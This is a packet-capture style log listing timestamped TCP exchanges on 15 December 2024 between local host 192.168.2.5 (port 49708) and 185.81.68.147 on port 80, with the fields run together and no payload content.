                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.019646883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.020723104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.067617893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152312040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152492046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152573109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152851105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152932882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.152971029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154098988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154231071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.154269934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155240059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155324936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.155364990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156347036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156451941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.156491041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157515049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157588005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.157659054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158679008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158781052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.158819914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.159826994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160029888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160062075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.160979033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.161083937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.161151886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162132978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162175894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.162211895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163341045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163408041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.163448095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164477110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164586067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.164654016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165673018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165766001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.165798903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166834116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166939020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.166974068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.167958021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.168112993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.168147087 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169137955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169328928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.169363976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170283079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170398951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.170461893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171456099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171566010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.171600103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172596931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172718048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.172754049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.173787117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.173929930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.173995972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.174925089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.175059080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.175092936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.176137924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.176158905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.176198006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.177242994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.177344084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.177407980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.178417921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.178528070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.178569078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.179572105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.179831028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.179866076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.180737019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.180839062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.180912971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.182029963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.182146072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.182177067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.183054924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.183146000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.183181047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.184233904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.184387922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.184418917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.185385942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.185487032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.185549974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.186551094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.186649084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.186683893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.187695980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.187824011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.187855959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.188873053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.188967943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.189035892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.190053940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.190176964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.190232038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.191215038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.191323996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.191356897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.192332983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.192449093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.192538977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.193501949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.193634987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.193670034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.194706917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.194816113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.194853067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.195835114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.195945978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.196017981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.197056055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.197098970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.197174072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.198157072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.198280096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.198342085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.199311018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.199470043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.199532986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.200478077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.200635910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.200709105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.201607943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.201750040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.201821089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.202821016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.202903986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.202967882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.203943014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.204056025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.204122066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.205122948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.205188036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.205272913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.206275940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.206373930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.206440926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.207438946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.207608938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.207673073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.208599091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.208758116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.208837986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.209783077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.209903002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.209969997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.210947990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.211056948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.211127996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.212110996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.212255955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.212325096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.213212967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.255002975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.344741106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.344887972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.344969034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.345288992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.345441103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.345515966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.346446037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.346457958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.346534967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.347167015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.347266912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.347338915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.348311901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.348400116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.348469019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.349611998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.349941969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.350018024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.350747108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.351016045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.351094007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.351818085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.351928949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.352011919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.353044987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.353703022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.353804111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354141951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354264975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.354371071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355288029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355357885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.355487108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356425047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356587887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.356652975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357594013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357709885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.357780933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358772993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358870983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.358942032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.359963894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.360069036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.360141039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361094952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361181974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.361257076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362282038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362381935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.362462997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363437891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363524914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.363600016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364572048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364706993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.364777088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365746021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365888119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.365957975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.366899967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.366991043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.367058039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368052959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368125916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.368191957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369215012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369302034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.369369030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370389938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370429993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.370465040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371542931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371674061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.371711016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372749090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372833967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.372900009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.373858929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.373970985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.374005079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375009060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375102997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.375138998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376189947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376312017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.376380920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377346039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377482891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.377517939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378505945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378598928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.378640890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379702091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379801989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.379873991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380821943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380889893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.380919933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.381985903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.382085085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.382118940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383193970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383260012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.383335114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384310961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384371996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.384413958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385560036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385672092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.385704041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386667013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.386744976 CET8049708185.81.68.147192.168.2.5
